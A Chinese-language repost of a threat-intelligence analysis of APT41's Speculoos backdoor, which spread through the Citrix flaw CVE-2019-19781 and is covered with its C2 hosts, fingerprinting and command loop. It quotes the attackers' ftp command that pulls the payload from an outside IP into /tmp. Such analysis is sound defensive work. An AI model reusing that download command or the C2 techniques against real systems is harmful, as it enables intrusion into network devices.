如何进行APT41 Speculoos后门分析

这篇文章将为大家详细讲解有关如何进行APT41 Speculoos后门分析,文章内容质量较高,因此小编分享给大家做个参考,希望大家阅读完这篇文章后对相关知识有一定的了解。

2020年3月25日,FireEye发表了APT41全球攻击活动报告。此攻击活动发生在1月20日至3月11日期间,主要对Citrix,Cisco和Zoho网络设备进行攻击。研究人员根据WildFire和AutoFocus数据获得了针对Citrix设备的攻击样本‘Speculoos’,还确定了北美,南美和欧洲等世界各地多个行业的受害者。

如何进行APT41 Speculoos后门分析

Speculoos的基于FreeBSD实现的,共识别出五个样本,所有样本文件大小基本相同,样本集之间存在微小差异。Speculoos利用CVE-2019-19781进行攻击传播,CVE-2019-19781影响Citrix Application Delivery Controller,Citrix Gateway和Citrix SD-WAN WANOP等设备,允许攻击者远程执行任意命令。

攻击细节

攻击者利用CVE-2019-19781远程执行命令:’/usr/bin/ftp -o /tmp/bsd ftp://test:[redacted]@ 66.42.98[.]220/<filename>’。

名列前茅波攻击始于2020年1月31日晚上,使用的文件名为bsd,影响了美国的多个高等教育机构,美国医疗机构和爱尔兰咨询公司。第二波攻击始于2020年2月24日,使用文件名为un,影响了哥伦比亚高等教育机构,奥地利制造组织,美国高等教育机构以及美国的州政府。

基于BSD系统的恶意软件相对少见,此工具和特定Citrix网络设备有关,因此Speculoos很可能是APT41组织专为此攻击活动研发的。

二进制分析

Speculoos后门是使用GCC 4.2.1编译的ELF可执行文件,可在FreeBSD系统上运行。 该负载无法保持持对目标持久控制,因此攻击者会使用额外的组件或其他攻击手段维持控制。 后门执行后将进入循环,该循环调用函数通过443端口与C2域进行通信:

alibaba.zzux[.]com (119.28.139[.]120)

如果无法通信,Speculoos会尝试通过443端口与119.28.139[.]20上的备份C2通信。如果连接到任一C2服务器,它将与服务器进行TLS握手。 图1显示了发送到C2服务器的数据包。

如何进行APT41 Speculoos后门分析

它请求login.live [.] com作为Server Name Indication(SNI)。

如何进行APT41 Speculoos后门分析

成功连接到C2并完成TLS握手后,Speculoos将对目标系统进行指纹识别,并将数据发送回C2服务器。其结构如下表1所示。

如何进行APT41 Speculoos后门分析

数据通过TLS通道发送,并且Speculoos会等待服务器的两字节响应。 收到响应后,它将向C2发送一个字节(0xa),并进入循环等待命令。 表2为攻击者可执行命令, 可让攻击者完全控制受害者系统。

如何进行APT41 Speculoos后门分析

研究中分析的两个Speculoos样本在功能上相同,两者之间只有八个字节不同,在收集系统信息时‘hostname‘和‘uname -s’命令不同导致。uname -s返回内核信息,hostname返回主机系统名称。 下图显示了两个Speculoos样本之间的二进制比较。

如何进行APT41 Speculoos后门分析

影响评估

互联网可访问设备允许未经授权的用户远程执行代会带来很大的安全问题,CVE-2019-19781影响了多个面向互联网的设备,攻击者积极利用此漏洞来安装自定义后门。受影响组织大量的网络活动都必须经过这些网络设备,攻击者可以监视或修改整个组织的网络活动。

默认情况下通过这些设备可以直接访问组织系统内部,攻击者无需考虑内部网络横向移动的问题。攻击者可以修改网络流量,注入恶意代码,执行中间人攻击,或将用户重定向到虚假登录页面来收集登录凭证。

关于如何进行APT41 Speculoos后门分析就分享到这里了,希望以上内容可以对大家有一定的帮助,可以学到更多知识。如果觉得文章不错,可以把它分享出去让更多的人看到。

文章标题:如何进行APT41 Speculoos后门分析,发布者:亿速云,转载请注明出处:https://worktile.com/kb/p/25008

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
亿速云的头像亿速云
上一篇 2022年9月15日
下一篇 2022年9月15日

相关推荐

  • 2024年9款优质CRM系统全方位解析

    文章介绍的工具有:纷享销客、Zoho CRM、八百客、红圈通、简道云、简信CRM、Salesforce、HubSpot CRM、Apptivo。 在选择合适的CRM系统时,许多企业面临着功能繁多、选择困难的痛点。对于中小企业来说,找到一个既能提高客户关系管理效率,又能适应业务扩展的CRM系统尤为重要…

    2024年7月25日
    1600
  • 数据库权限关系图表是什么

    数据库权限关系图表是一种以图表形式展示数据库权限分配和管理的工具。它可以有效地帮助我们理解和管理数据库中的各种权限关系。数据库权限关系图表主要包含以下几个部分:数据对象、用户(或用户组)、权限类型、权限级别、权限状态等。其中,数据对象是权限关系图表中的核心元素,它代表了数据库中的各种数据资源,如表、…

    2024年7月22日
    200
  • 诚信数据库是什么意思

    诚信数据库是一种收集、存储和管理个人或组织诚信信息的系统。它是一种用于评估和管理个人或组织行为的工具,通常由政府、商业组织或者非营利组织进行运营。诚信数据库的主要功能包括:1、评估个人或组织的诚信状况;2、提供决策支持;3、预防和控制风险;4、促进社会信用体系建设。 在这四大功能中,评估个人或组织的…

    2024年7月22日
    400
  • 数据库期末关系代数是什么

    关系代数是一种对关系进行操作的代数系统,是关系模型的数学基础,主要用于从关系数据库中检索数据。其操作包括选择、投影、并集、差集、笛卡尔积、连接、除法等。其中,选择操作是对关系中的元组进行筛选,只保留满足某一条件的元组;投影操作则是从关系中选择出一部分属性构造一个新的关系。 一、选择操作 选择操作是关…

    2024年7月22日
    700
  • mysql建立数据库用什么命令

    在MySQL中,我们使用"CREATE DATABASE"命令来创建数据库。这是一个非常简单且基础的命令,其语法为:CREATE DATABASE 数据库名。在这个命令中,“CREATE DATABASE”是固定的,而“数据库名”则是你要创建的数据库的名称,可以自己设定。例如,如…

    2024年7月22日
    500
注册PingCode 在线客服
站长微信
站长微信
电话联系

400-800-1024

工作日9:30-21:00在线

分享本页
返回顶部